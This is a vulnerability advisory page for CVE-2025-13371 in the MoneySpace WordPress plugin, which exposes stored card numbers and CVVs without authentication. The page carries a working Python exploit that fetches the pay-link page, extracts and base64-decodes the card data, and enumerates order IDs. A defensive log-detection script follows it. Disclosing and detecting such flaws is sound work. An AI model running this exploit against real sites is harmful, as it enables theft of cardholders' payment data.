Security Vulnerability Report
CVE-2025-13371 CVSS 8.6 HIGH

Published: 2026-01-07 12:16:48
Last Modified: 2026-04-15 00:35:42

Description

The MoneySpace plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.13.9. This is due to the plugin storing full payment card details (PAN, card holder name, expiry month/year, and CVV) in WordPress post_meta using base64_encode(), and then embedding these values into the publicly accessible mspaylink page's inline JavaScript without any authentication or authorization check. This makes it possible for unauthenticated attackers who know or can guess an order_id to access the mspaylink endpoint and retrieve full credit card numbers and CVV codes directly from the HTML/JS response, constituting a severe PCI-DSS violation.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

MoneySpace WordPress Plugin < 2.13.9 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import re
import base64

# CVE-2025-13371 PoC - MoneySpace Plugin Sensitive Information Disclosure
# Target: WordPress site with MoneySpace plugin (<= 2.13.9)
# Vulnerability: Unauthenticated access to mspaylink endpoint exposes full credit card details


def exploit_moneyspace_cve_2025_13371(target_url, order_id):
    """
    Exploit for CVE-2025-13371
    This PoC demonstrates how an unauthenticated attacker can retrieve full credit card details
    by accessing the mspaylink endpoint with a known order_id.

    WARNING: This code is for educational and authorized security testing only.
    """
    # Construct the mspaylink URL with the target order_id
    mspaylink_url = f"{target_url.rstrip('/')}/?mspaylink=1&order_id={order_id}"
    print(f"[*] Targeting: {mspaylink_url}")
    print(f"[*] Attempting to retrieve payment card details for order_id: {order_id}")

    try:
        # Send HTTP GET request without any authentication
        response = requests.get(mspaylink_url, timeout=10)

        if response.status_code == 200:
            # Extract inline JavaScript containing sensitive card data
            # The plugin embeds card details in JavaScript variables
            # Extract patterns commonly used by the plugin
            patterns = {
                'card_number': r'(?:pan|card_number|cardnum)[\'"]\s*:\s*[\'"]([0-9]+)[\'"]',
                'cvv': r'(?:cvv|cvc)[\'"]\s*:\s*[\'"]([0-9]{3,4})[\'"]',
                'expiry': r'(?:expiry|exp_date|valid_thru)[\'"]\s*:\s*[\'"]([0-9/\-]+)[\'"]',
                'card_holder': r'(?:name|holder|card_holder|holder_name)[\'"]\s*:\s*[\'"]([^\'"]+)[\'"]'
            }

            print("\n[+] Successfully accessed mspaylink endpoint!")
            print("\n[+] Extracted sensitive information:")

            for data_type, pattern in patterns.items():
                matches = re.findall(pattern, response.text, re.IGNORECASE)
                if matches:
                    for match in matches:
                        # Decode base64 encoded data if present
                        try:
                            decoded = base64.b64decode(match).decode('utf-8')
                            print(f"  {data_type}: {decoded} (base64 decoded)")
                        except Exception:
                            print(f"  {data_type}: {match}")

            # Also search for base64 encoded data directly
            b64_pattern = r'"([A-Za-z0-9+/=]{20,})"'
            b64_matches = re.findall(b64_pattern, response.text)
            print("\n[+] Potential base64 encoded data found:")
            for b64_data in b64_matches[:5]:  # Limit to first 5
                try:
                    decoded = base64.b64decode(b64_data).decode('utf-8', errors='ignore')
                    if decoded.isprintable() and len(decoded) > 4:
                        print(f"  {b64_data[:30]}... -> {decoded}")
                except Exception:
                    pass
        else:
            print(f"[-] Failed to access endpoint. Status code: {response.status_code}")

    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")


def scan_for_vulnerable_order_ids(target_url, id_range=(1000, 2000)):
    """
    Scan for vulnerable order IDs using a range
    In real attack scenarios, attackers might use enumeration or guess order IDs
    """
    print(f"[*] Scanning for vulnerable order IDs in range {id_range[0]}-{id_range[1]}")
    vulnerable_orders = []
    for order_id in range(id_range[0], id_range[1] + 1):
        mspaylink_url = f"{target_url.rstrip('/')}/?mspaylink=1&order_id={order_id}"
        try:
            response = requests.get(mspaylink_url, timeout=5)
            if response.status_code == 200 and 'card' in response.text.lower():
                print(f"[+] Potential vulnerable order found: {order_id}")
                vulnerable_orders.append(order_id)
        except Exception:
            pass
    return vulnerable_orders


# Example usage
if __name__ == "__main__":
    target = "https://example-wordpress-site.com"
    order_id = 12345  # Replace with actual order ID

    # Single target exploitation
    exploit_moneyspace_cve_2025_13371(target, order_id)

    # Or scan for vulnerable orders
    # vulnerable = scan_for_vulnerable_order_ids(target, (1000, 5000))
```
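A defender-side check for the exposure described above, added here and not taken from the PoC or from the plugin: it parses web-server access logs and flags any client that successfully fetched the pay-link page for many distinct order_ids, which is the order_id guessing the advisory describes. It assumes the query-string shape `?mspaylink=1&order_id=` used by the PoC; the log lines are constructed samples.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs

# Assumption (not taken from the plugin): the vulnerable page is requested as
# /?mspaylink=1&order_id=<id>, the query-string shape used by the PoC on this page.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def parse_mspaylink_hit(line):
    """Return (client_ip, order_id, status) for a request to the pay-link page, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    qs = parse_qs(urlparse(m.group("path")).query)
    if qs.get("mspaylink") != ["1"] or "order_id" not in qs:
        return None
    return m.group("ip"), qs["order_id"][0], int(m.group("status"))

def find_enumeration(lines, threshold=5):
    """Flag client IPs that successfully fetched at least `threshold` distinct order_ids.
    A customer opens the pay link for one order; one IP walking many order_ids is guessing."""
    seen = defaultdict(set)
    for line in lines:
        hit = parse_mspaylink_hit(line)
        if hit and hit[2] == 200:  # count only pages that actually rendered
            seen[hit[0]].add(hit[1])
    return {ip: sorted(ids) for ip, ids in seen.items() if len(ids) >= threshold}

# Constructed sample access-log lines (Apache combined format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Jan/2026:12:20:01 +0000] "GET /?mspaylink=1&order_id=1000 HTTP/1.1" 200 5120 "-" "python-requests/2.31"',
    '203.0.113.7 - - [07/Jan/2026:12:20:01 +0000] "GET /?mspaylink=1&order_id=1001 HTTP/1.1" 200 5118 "-" "python-requests/2.31"',
    '203.0.113.7 - - [07/Jan/2026:12:20:02 +0000] "GET /?mspaylink=1&order_id=1002 HTTP/1.1" 200 5121 "-" "python-requests/2.31"',
    '203.0.113.7 - - [07/Jan/2026:12:20:02 +0000] "GET /?mspaylink=1&order_id=1003 HTTP/1.1" 200 5119 "-" "python-requests/2.31"',
    '203.0.113.7 - - [07/Jan/2026:12:20:03 +0000] "GET /?mspaylink=1&order_id=1004 HTTP/1.1" 200 5122 "-" "python-requests/2.31"',
    '203.0.113.7 - - [07/Jan/2026:12:20:03 +0000] "GET /?mspaylink=1&order_id=1000 HTTP/1.1" 200 5120 "-" "python-requests/2.31"',
    '203.0.113.7 - - [07/Jan/2026:12:20:04 +0000] "GET /?mspaylink=1&order_id=1005 HTTP/1.1" 404 312 "-" "python-requests/2.31"',
    '198.51.100.23 - - [07/Jan/2026:12:25:40 +0000] "GET /?mspaylink=1&order_id=4821 HTTP/1.1" 200 5117 "https://shop.example/checkout/" "Mozilla/5.0"',
    '192.0.2.9 - - [07/Jan/2026:12:26:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2030 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, ids in find_enumeration(SAMPLE_LOG).items():
        print(f"possible order_id enumeration from {ip}: {ids}")
```

Log detection only narrows the exposure window; the root cause in the description (card data kept in post_meta and rendered into the page) still requires updating the plugin beyond 2.13.9 and removing any card data already stored.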

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13371", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:16:47.583", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The MoneySpace plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.13.9. This is due to the plugin storing full payment card details (PAN, card holder name, expiry month/year, and CVV) in WordPress post_meta using base64_encode(), and then embedding these values into the publicly accessible mspaylink page's inline JavaScript without any authentication or authorization check. This makes it possible for unauthenticated attackers who know or can guess an order_id to access the mspaylink endpoint and retrieve full credit card numbers and CVV codes directly from the HTML/JS response, constituting a severe PCI-DSS violation."}, {"lang": "es", "value": "El plugin MoneySpace para WordPress es vulnerable a la Exposición de Información Sensible en todas las versiones hasta la 2.13.9, inclusive. Esto se debe a que el plugin almacena los detalles completos de la tarjeta de pago (PAN, nombre del titular de la tarjeta, mes/año de vencimiento y CVV) en el post_meta de WordPress utilizando base64_encode(), y luego incrusta estos valores en el JavaScript en línea de la página mspaylink, que es de acceso público, sin ninguna comprobación de autenticación o autorización. 
Esto hace posible que atacantes no autenticados que conozcan o puedan adivinar un order_id accedan al endpoint mspaylink y recuperen números completos de tarjetas de crédito y códigos CVV directamente de la respuesta HTML/JS, lo que constituye una grave violación de PCI-DSS."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://github.com/MoneySpace-net/money-space-for-Woocommerce/blob/e79d96cfc1b12cece15c6f0b309045403cc6a9d2/view/mspaylink.php#L164", "source": "[email protected]"}, {"url": "https://github.com/MoneySpace-net/money-space-for-Woocommerce/blob/e79d96cfc1b12cece15c6f0b309045403cc6a9d2/view/mspaylink.php#L232", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/money-space/tags/2.13.9/view/mspaylink.php#L232", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/money-space/trunk/view/mspaylink.php#L232", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3426909%40money-space&new=3426909%40money-space&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/77db827d-9afd-4b59-b0ad-1ad562634c52?source=cve", "source": "[email protected]"}]}}